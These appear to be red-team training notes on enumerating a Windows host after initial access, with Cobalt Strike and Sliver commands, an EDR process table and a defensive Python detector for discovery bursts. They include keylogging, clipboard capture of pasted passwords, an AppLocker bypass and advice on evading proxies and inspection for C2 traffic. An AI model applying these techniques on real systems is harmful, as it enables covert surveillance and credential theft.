Internal Recon & Enumeration
Host-level enumeration after gaining initial access — understanding the environment, identifying targets, and assessing defences.
OPSEC: Running many enumeration commands generates telemetry. Seatbelt is preferable to individual queries as it’s a single process execution.
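As an added defender-side illustration of that telemetry (not code from the original notes), the Python below flags a burst of distinct discovery binaries spawned by one parent process within a short window; the Sysmon-style process-creation events are constructed samples, and the image list and threshold are assumptions.

```python
"""Flag bursts of host/network discovery commands under one parent process.
Each manual enumeration command is its own process-creation event (Sysmon
Event ID 1 / Windows 4688), so a run of them from one parent is detectable."""
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed watch-list: binaries behind common manual recon commands.
DISCOVERY_IMAGES = {
    "ipconfig.exe", "arp.exe", "route.exe", "nslookup.exe",
    "net.exe", "netsh.exe", "reg.exe", "whoami.exe", "tasklist.exe",
}

# Constructed Sysmon-style events: (UtcTime, ParentProcessId, Image, CommandLine)
SAMPLE_EVENTS = [
    ("2024-05-01 10:00:01", 4120, r"C:\Windows\System32\ipconfig.exe", "ipconfig /all"),
    ("2024-05-01 10:00:04", 4120, r"C:\Windows\System32\ARP.EXE", "arp -a"),
    ("2024-05-01 10:00:07", 4120, r"C:\Windows\System32\ROUTE.EXE", "route print"),
    ("2024-05-01 10:00:11", 4120, r"C:\Windows\System32\net.exe", "net share"),
    ("2024-05-01 10:00:15", 4120, r"C:\Windows\System32\netsh.exe", "netsh winhttp show proxy"),
    ("2024-05-01 10:00:20", 4120, r"C:\Windows\System32\reg.exe", "reg query HKCU\\..."),
    ("2024-05-01 10:30:00", 7788, r"C:\Windows\System32\ipconfig.exe", "ipconfig /all"),
    ("2024-05-01 10:45:00", 7788, r"C:\Windows\System32\notepad.exe", "notepad.exe"),
]

def detect_discovery_bursts(events, window_seconds=60, min_distinct=4):
    """Return {parent_pid: sorted distinct image names} for every parent that
    spawned at least `min_distinct` different discovery binaries within
    `window_seconds` of each other. Image names are compared case-insensitively."""
    by_parent = defaultdict(list)
    for utc, ppid, image, _cmd in events:
        name = image.rsplit("\\", 1)[-1].lower()
        if name in DISCOVERY_IMAGES:
            by_parent[ppid].append((datetime.strptime(utc, "%Y-%m-%d %H:%M:%S"), name))
    hits = {}
    window = timedelta(seconds=window_seconds)
    for ppid, seq in by_parent.items():
        seq.sort()  # chronological, so each start index opens a sliding window
        for i, (t0, _) in enumerate(seq):
            in_window = {n for t, n in seq[i:] if t - t0 <= window}
            if len(in_window) >= min_distinct:
                hits[ppid] = sorted(in_window)
                break
    return hits

if __name__ == "__main__":
    for ppid, names in detect_discovery_bursts(SAMPLE_EVENTS).items():
        print(f"parent pid {ppid}: discovery burst -> {', '.join(names)}")
```

A single Seatbelt execution is one process-creation event and would not trip this count, which is the point the OPSEC note makes.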
Process Enumeration
Cobalt Strike
beacon> ps
When running at medium integrity (standard user), you cannot see architecture, session, or user info for processes owned by other users.
Processes of interest/concern:
| Process | Product |
|---|---|
| Sysmon64 / Sysmon | Sysmon — monitors and logs system activity via Windows Event Log |
| MsMpEng | Microsoft Defender — Malware Protection Engine |
| elastic-endpoint / elastic-agent | Elastic Security (EDR) |
| CrowdStrike / CSFalconService | CrowdStrike Falcon (EDR) |
| cb / CbDefense | Carbon Black (EDR) |
| SentinelAgent | SentinelOne (EDR) |
Screenshots & Keylogging
Gather intel on victim behaviour, applications, documents, and shortcuts.
Cobalt Strike
# Screenshots
beacon> printscreen # single screenshot via PrintScr method
beacon> screenshot # single screenshot
beacon> screenwatch # periodic screenshots of desktop
# View > Screenshots to review
# Keylogger
beacon> keylogger # start capturing keystrokes
# View > Keystrokes to review
beacon> jobs
beacon> jobkill <JOB_ID> # stop the keylogger
# Clipboard
beacon> clipboard # capture current clipboard text (not images)
Tip: Clipboard capture is especially effective when password managers are in use — users frequently copy/paste credentials.
User Sessions
Identify who else is logged into this machine — privileged users are candidates for lateral movement.
Cobalt Strike
beacon> net logons
Host Audit (Seatbelt)
Automated host enumeration covering security configurations, installed software, and policy settings.
Cobalt Strike
# System-level checks (OS info, AV, AppLocker, LAPS, PowerShell logging, audit policies, .NET, firewall)
beacon> execute-assembly Seatbelt.exe -group=system
# User-level checks (browser data, recent files, cloud credentials, etc.)
beacon> execute-assembly Seatbelt.exe -group=user
# Everything
beacon> execute-assembly Seatbelt.exe -group=all
Sliver
# Standard execution
seatbelt -- -group=system
seatbelt -- -group=all
# Inline execution (bypasses AppLocker)
execute-assembly -i /path/to/Seatbelt.exe -group=all
Network & Environment
Map the local network environment.
Manual
# Network interfaces
ipconfig /all
# ARP table (nearby hosts)
arp -a
# Routing table
route print
# DNS configuration
nslookup
ipconfig /displaydns
# Shares
net share
# Proxy settings
netsh winhttp show proxy
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
Defence Awareness
Understanding the target’s defensive posture affects beacon selection and operational approach.
Proxy Authentication: Many organisations require authentication (often AD-integrated) before clients can use the web proxy. This typically requires membership in Domain Users or a custom group. Computer accounts and SYSTEM are usually excluded — meaning HTTP(S) Beacons running as SYSTEM cannot communicate through the proxy.
Implication: Use P2P (SMB/TCP) or DNS beacons for SYSTEM persistence, not HTTP.
HTTPS Offloading / Inspection: Organisations with internal PKI may perform SSL offloading — decrypting HTTPS traffic at the proxy for inspection, then re-encrypting with an internal CA cert. Even HTTPS C2 traffic can be inspected. Certificate pinning on implants can prevent this but may cause the proxy to block traffic entirely.
Content Filtering: Proxies may block download/upload of specific file types (.exe, .dll, .ps1) and scan for known malicious content. This impacts payload delivery and exfiltration.
Web Categorisation: Organisations block site categories (social media, gambling, malware). C2 domains need to be in an acceptable category. Tools like Bluecoat and Chameleon can help with categorisation.